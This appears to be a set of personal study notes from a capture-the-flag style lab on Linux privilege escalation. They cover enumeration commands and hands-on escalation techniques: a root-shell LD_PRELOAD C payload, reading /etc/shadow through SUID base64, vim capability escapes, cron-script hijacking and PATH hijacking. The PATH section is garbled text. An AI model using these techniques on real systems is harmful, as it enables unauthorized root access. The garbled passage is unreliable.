LINUX privilege escalation

Enumeration

hostname it can provide information about the target system’s role within the corporate network (e.g. SQL-PROD-01 for a production SQL server).
uname -a Will print system information giving us additional detail about the kernel used by the system
/proc/version The proc filesystem (procfs) provides information about the target system processes. Looking at /proc/version may give you information on the
kernel version and additional data such as whether a compiler (e.g. GCC) is installed.
/etc/issue While on the subject, any file containing system information can be customized or changed. For a clearer understanding of the system, it is always
good to look at all of these.

ps Command
ps aux : The aux option will show processes for all users (a), display the user that launched the process (u), and show processes that are not attached to a
terminal (x).
ps -A : View all running processes
ps axjf : View process tree (see the tree formation until ps axjf is run below)

env command will show environmental variables.

sudo -l command can be used to list all commands your user can run using sudo.
/etc/passwd file can be an easy way to discover users on the system. {cat /etc/passwd | cut -d ":" -f 1}
ifconfig command will give us information about the network interfaces of the system.This can be confirmed using the ip route command to see which
network routes exist.
netstat command can be used with several different options to gather information on existing connections.
netstat -a : shows all listening ports and established connections.
netstat -at or netstat -au can also be used to list TCP or UDP protocols respectively.
netstat -l : list ports in “listening” mode. These ports are open and ready to accept incoming connections. This can be used with the “t” option to list only
ports that are listening using the TCP protocol
netstat -s : list network usage statistics by protocol (below) This can also be used with the -t or -u options to limit the output to a specific protocol.
netstat -tp : list connections with the service name and PID information.This can also be used with the -l option to list listening ports
netstat -i : Shows interface statistics.
netstat -ano which could be broken down as follows;
-a : Display all sockets
-n : Do not resolve names
-o : Display timers

find . -name flag1.txt : find the file named “flag1.txt” in the current directory
find /home -name flag1.txt : find the file names “flag1.txt” in the /home directory
find / -type d -name config : find the directory named config under “/”
find / -type f -perm 0777 : find files with the 777 permissions (files readable, writable, and executable by all users)
find / -perm a=x : find executable files
find /home -user frank : find all files for user “frank” under “/home”
find / -mtime 10 : find files that were modified in the last 10 days
find / -atime 10 : find files that were accessed in the last 10 day
find / -cmin -60 : find files changed within the last hour (60 minutes)
find / -amin -60 : find files accesses within the last hour (60 minutes)
find / -size 50M : find files with a 50 MB size
It is important to note that the “find” command tends to generate errors which sometimes makes the output hard to read. This is why it would be wise to use
the “find” command with “-type f 2>/dev/null” to redirect errors to “/dev/null” and have a cleaner output

Folders and files that can be written to or executed from:

find / -writable -type d 2>/dev/null : Find world-writeable folders

find / -perm -222 -type d 2>/dev/null : Find world-writeable folders
find / -perm -o w -type d 2>/dev/null : Find world-writeable folders
find / -perm -o x -type d 2>/dev/null : Find world-executable folders

Find development tools and supported languages:

find / -name perl*

find / -name python*
find / -name gcc*

find / -perm -u=s -type f 2>/dev/null : Find files with the SUID bit, which allows us to run the file with a higher privilege level than the current
user.
Please spend some time getting comfortable with commands such as find, locate, grep, cut, sort, etc

============================================================================

AUTOMATED enumeration tools

Several tools can help you save time during the enumeration process. These tools should only be used to save time knowing they may miss some privilege
escalation vectors. Below is a list of popular Linux enumeration tools with links to their respective Github repositories.

The target system’s environment will influence the tool you will be able to use. For example, you will not be able to run a tool written in Python if it is not
installed on the target system. This is why it would be better to be familiar with a few rather than having a single go-to tool.

LinPeas:
LinEnum:
LES (Linux Exploit Suggester):
Linux Smart Enumeration:
Linux Priv Checker:

===============================================================================
P/E;kernel exploits

The kernel on Linux systems manages the communication between components such as the memory on the system and applications. This critical function
requires the kernel to have specific privileges; thus, a successful exploit will potentially lead to root privileges.

The Kernel exploit methodology is simple;

1.Identify the kernel version
2.Search and find an exploit code for the kernel version of the target system
3.Run the exploit

Research sources:

1.Based on your findings, you can use Google to search for an existing exploit code.
2.Sources such as https://www.linuxkernelcves.com/cves can also be useful.
3.Another alternative would be to use a script like LES (Linux Exploit Suggester) but remember that these tools can generate false positives (report a kernel
vulnerability that does not affect the target system) or false negatives (not report any kernel vulnerabilities although the kernel is vulnerable).

You can transfer the exploit code from your machine to the target system using the SimpleHTTPServe r Python module and wget respectively.

===============================================================================

P/E;sudo

The sudo command, by default, allows you to run a program with root privileges. Under some conditions, system administrators may need to give regular
users some flexibility on their privileges. For example, a junior SOC analyst may need to use Nmap regularly but would not be cleared for full root access. In
this situation, the system administrator can allow this user to only run Nmap with root privileges while keeping its regular privilege level throughout the rest of
the system.

Any user can check its current situation related to root privileges using the sudo -l command.

is a valuable source that provides information on how any program, on which you may have sudo rights, can be used.

Some applications will not have a known exploit within this context.In this case, we can use a "hack" to leak information leveraging a function of the
application.

Leverage LD_PRELOAD
LD_PRELOAD is a function that allows any program to use shared libraries. This post will give you an idea about the capabilities of LD_PRELOAD. If the
"env_keep" option is enabled we can generate a shared library which will be loaded and executed before the program is run. Please note the LD_PRELOAD
option will be ignored if the real user ID is different from the effective user ID.

The steps of this privilege escalation vector can be summarized as follows;

1.Check for LD_PRELOAD (with the env_keep option)

2.Write a simple C code compiled as a share object (.so extension) file
3.Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file
The C code will simply spawn a root shell and can be written as follows;

`#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}`

We can save this code as shell.c and compile it using gcc into a shared object file
We need to run the program by specifying the LD_PRELOAD option, as follows;

sudo LD_PRELOAD=/home/user/ldpreload/shell.so find

This will result in a shell spawn with root privileges.

=============================================================================

P/E;SUID

Much of Linux privilege controls rely on controlling the users and files interactions. This is done with permissions. By now, you know that files can have read,
write, and execute permissions. These are given to users within their privilege levels. This changes with SUID (Set-user Identification) and SGID (Set-group
Identification). These allow files to be executed with the permission level of the file owner or the group owner, respectively.
these files have an “s” bit set showing their special permission level.

find / -type f -perm -04000 -ls 2>/dev/null will list files that have SUID or SGID bits set.

example of /base64
/usr/bin/base64 /etc/shadow | /usr/bin/base64 -d = this can be used to read any file data like we did to see /etc/shadow
To read it with base64, we first encrypt it with base64, then decode it by typing base64 -d and read it.

==============================================================================

P/E;capabilities

Capabilities help manage privileges at a more granular level.We can use the getcap tool to list enabled capabilities.
When run as an unprivileged user, getcap -r / will generate a huge amount of errors, so it is good practice to redirect the error messages to /dev/null .

./vim -c ':py3 import os; os.setuid(0): os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

./vim -c ':python3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

==============================================================================

P/E;cron jobs

Cron jobs are used to run scripts or binaries at specific times. By default, they run with the privilege of their owners and not the current user. While properly
configured cron jobs are not inherently vulnerable, they can provide a privilege escalation vector under some conditions.
The idea is quite simple; if there is a scheduled task that runs with root privileges and we can change the script that will be run, then our script will run with root
privileges.Cron job configurations are stored as crontabs (cron tables) to see the next time and date the task will run.
Any user can read the file keeping system-wide cron jobs under /etc/crontab

task = For Our firs method we use backup.sh file to gain root for this we use SIUD permission. We need to be root to read the flag5.txt file. We see that we
have a sh file that is automatically run every minute. To become root, we just need to change the contents of the backup.sh file using the nano backup.sh
command.we just need to give suid permission to /bin/bash , then we can run it and become root. We will use the chmod command to give suid
permission
#!/bin/bash chmod u+s /bin/bash #u+s is used give SUID permission
after we edit the backup.sh file we give all permission with chmod commad after that just simple use /bin/bash -p commad to gain root.

`chmod 777 backup.sh

/bin/bash -p`

==============================================================================

P/E;PATH
If a folder for which your user has write permission is located in the path, you could potentially hijack an application to run a script. PATH in Linux is an
environmental variable that tells the operating system where to search for executables. For any command that is not built into the shell or that is not defined
with an absolute path, Linux will start searching in folders defined under PATH.
If we type “thm” to the command line, these are the locations Linux will look in for an executable called thm. The scenario below will give you a better idea of
how this can be leveraged to increase our privilege level. As you will see, this depends entirely on the existing configuration of the target system, so be sure
you can answer the questions below before trying this.

What folders are located under $PATH

Does your current user have write privileges for any of these folders?
Can you modify
P AT H?Isthereascript/applicationyoucanstartthatwillbeaff ectedbythisvulnerability?Asimplesearchf orwritablef olderscandoneusin
writable2 >
/dev/null”‘command.T heoutputof thiscommandcanbecleanedusingasimplecutandsortsequence.Atthispointbecause/tmpisnotpresenti
/tmp :PATH`” command accomplishes this.
At this point the path script will also look under the /tmp folder for an executable named “thm”.
Creating this command is fairly easy by copying /bin/bash as “thm” under the /tmp folder.We have given executable rights to our copy of /bin/bash

==============================================================================

P/E;NFS

NFS (Network File Sharing) configuration is kept in the /etc/exports file. This file is created during the NFS server installation and can usually be read by
users.The critical element for this privilege escalation vector is the “no_root_squash” option. By default, NFS will change the root user to nfsnobody and strip
any file from operating with root privileges. If the “no_root_squash” option is present on a writable share, we can create an executable with SUID bit set and
run it on the target system.
example ;
=============================================================================